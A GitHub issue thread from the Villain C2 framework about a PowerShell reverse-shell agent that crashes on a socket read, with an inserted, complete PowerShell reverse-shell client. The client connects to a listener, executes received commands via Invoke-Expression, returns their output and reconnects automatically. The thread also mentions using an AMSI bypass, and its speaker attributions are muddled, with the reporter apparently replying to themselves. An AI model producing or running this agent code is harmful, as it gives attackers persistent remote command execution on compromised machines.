t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).

PowerShell Agent Unexpected Crashes: Issue with "Read" Method #147

Status: Closed (whydee86 closed this issue 1 week ago)

whydee86 commented 3 months ago

Description

The PowerShell agent generally operates smoothly, but I have encountered an issue where it unexpectedly crashes during execution. The crash is associated with an exception thrown when attempting to call the "Read" method with three arguments.

Steps to Reproduce

  1. Run the PowerShell agent under normal operating conditions (including the AMSI bypass; it is certainly not a Defender problem).
  2. During its execution, the agent occasionally crashes with the exception described above.

(Note: The issue appears to occur at random intervals, possibly influenced by network stability or remote server responses.)

Expected Behavior

The agent should handle network interruptions or reconnect attempts gracefully without crashing, possibly by implementing retry mechanisms or more robust error handling around the "Read" operation.

Actual Behavior

The agent crashes, leading to an abrupt termination of its execution. This disrupts workflows and requires manual intervention to restart the agent.

Looking forward to your support in resolving this issue. Thank you!


charbelmhanna commented 3 months ago

Based on the error I see, it seems that the remote host has closed the connection, meaning that it stopped listening on the port. It could also be a connection issue. Make sure that on the connection you're making to the "Victim" there is no connection timeout...

whydee86 commented 3 months ago

@whydee86, thanks a lot for the detailed issue description. Looks like one of the 3 arguments when calling read is null: $stream.Read($bytes, 0, $bytes.Length) Possibly the initialization of the $bytes byte array from the previous command did not complete in time, so when it gets to read it errors out? I'm kind of speculating for now. If that's true, then you can probably append this line (or similar) before the "read" command: while ($? -ne $true){sleep 0.5};.

I will have a closer look and get back to you.

Cheers

Great, if I can help with something or provide more information, please let me know. We should also add a reconnect mechanism to the agent in case of network failure. For example, try stopping the server for 5 seconds and then starting it again.
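The following PowerShell sketch is an added example, not Villain's own agent code and not anything the maintainers have shipped. It shows the two things discussed above together: the error handling the issue's "Expected Behavior" asks for around $stream.Read(), and the reconnect mechanism proposed in the reply. A zero-length read (peer closed the socket cleanly) or an IOException (peer reset it, or the listener went away) is treated as a lost connection, after which the agent reconnects with a capped exponential backoff instead of terminating. The listener address and port, and the assumption that the listener speaks plain TCP with one command per send, are placeholders.

```powershell
# Added example: reverse-shell client loop with robust Read() handling and reconnect.
# Not part of Villain. $C2Host / $C2Port are assumptions standing in for the listener.
param(
    [string]$C2Host = '10.0.0.1',      # assumption: listener address
    [int]$C2Port = 4443,               # assumption: listener port
    [int]$MaxBackoffSeconds = 60
)

function Connect-WithRetry {
    # Keeps trying to connect until the listener answers, doubling the delay
    # between attempts up to $MaxBackoff seconds (covers the "server stopped
    # for 5 seconds" scenario from the thread).
    param([string]$RemoteHost, [int]$Port, [int]$MaxBackoff)
    $delay = 1
    while ($true) {
        try {
            $client = New-Object System.Net.Sockets.TcpClient
            $client.Connect($RemoteHost, $Port)
            return $client
        } catch {
            # Listener down or network unreachable: wait and try again.
            Start-Sleep -Seconds $delay
            $delay = [Math]::Min($delay * 2, $MaxBackoff)
        }
    }
}

function Invoke-AgentLoop {
    param([string]$RemoteHost, [int]$Port, [int]$MaxBackoff)
    while ($true) {
        $client = Connect-WithRetry -RemoteHost $RemoteHost -Port $Port -MaxBackoff $MaxBackoff
        $stream = $client.GetStream()
        $writer = New-Object System.IO.StreamWriter($stream)
        $writer.AutoFlush = $true
        # Allocate the receive buffer once per connection. New-Object is
        # synchronous, so $bytes is never null when Read() runs below.
        $bytes = New-Object byte[] 65536
        try {
            while ($true) {
                # NetworkStream.Read() returns 0 when the peer closes the
                # connection and throws System.IO.IOException when it is reset.
                $count = $stream.Read($bytes, 0, $bytes.Length)
                if ($count -le 0) { break }   # remote closed: go reconnect
                $command = [System.Text.Encoding]::UTF8.GetString($bytes, 0, $count).Trim()
                if ($command.Length -eq 0) { continue }
                if ($command -eq 'exit') { return }
                # A failing command must not take the agent down either.
                $output = ''
                try { $output = Invoke-Expression $command 2>&1 | Out-String }
                catch { $output = $_.Exception.Message }
                $writer.Write($output)
            }
        } catch [System.IO.IOException] {
            # Connection reset or aborted mid-read: fall through to reconnect.
        } catch [System.ObjectDisposedException] {
            # Stream disposed underneath us: fall through to reconnect.
        } finally {
            $client.Close()
        }
        Start-Sleep -Seconds 1
    }
}

Invoke-AgentLoop -RemoteHost $C2Host -Port $C2Port -MaxBackoff $MaxBackoffSeconds
```

Two practitioner notes on the design. Only transient socket failures are retried: if $bytes really were null, Stream.Read() would throw an ArgumentNullException, which is a programming error and is deliberately left uncaught here. And because Read() with no ReadTimeout blocks forever, a half-open connection (listener host rebooted without sending a FIN or RST) is not detected by this loop; setting $stream.ReadTimeout turns that case into an IOException, at the cost of also reconnecting during long idle periods.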

t3l3machus commented 3 months ago

@whydee86 by the way, you can probably use nishang as an agent to connect to Villain via TCP, which is more sophisticated.